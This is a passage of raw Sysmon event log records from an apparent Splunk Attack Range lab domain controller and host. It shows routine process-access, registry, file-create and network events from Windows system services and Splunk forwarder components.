Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53ADC6A35B7113446AC6ECCA20BD22C7,SHA256=E39672EBE3A84FCDEEA6E3A2BFAFDB7932B7D678063608D1AB13C0A9871CA777,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.606{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18A2-629A-5C42-000000005F02}7512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.606{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-18A2-629A-5C42-000000005F02}7512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.606{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18A2-629A-5C42-000000005F02}7512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.607{2E1864BB-18A2-629A-5C42-000000005F02}7512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x8000000000000000205677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000205676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00d8710e) 13241300x8000000000000000205675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8774c-0xaaf81fd1) 13241300x8000000000000000205674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d87755-0x0cbc87d1) 13241300x8000000000000000205673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d8775d-0x6e80efd1) 13241300x8000000000000000205672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000205671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00d8710e) 13241300x8000000000000000205670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8774c-0xaaf81fd1) 13241300x8000000000000000205669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d87755-0x0cbc87d1) 13241300x8000000000000000205668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:18.391{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d8775d-0x6e80efd1) 23542300x8000000000000000205667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.328{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30136C7AE8A09DABD10CFD5EE5E6635E,SHA256=1ECEC79BA3E91E278581A2ACD1911362DE7258BF7A5229D406E00536421071FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.216{2E1864BB-18A1-629A-5B42-000000005F02}32121488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:18.037{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2659A3BF57D70AF45C60582535FE5390,SHA256=30598BA7F8A8E47B72CCA0F0126930E42F79C028644C010DA49B59030590BDFC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044612Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:15.600{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52370-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000205736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA41-6299-5C07-000000005F02}5320C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA41-6299-5C07-000000005F02}5320C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA41-6299-5C07-000000005F02}5320C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 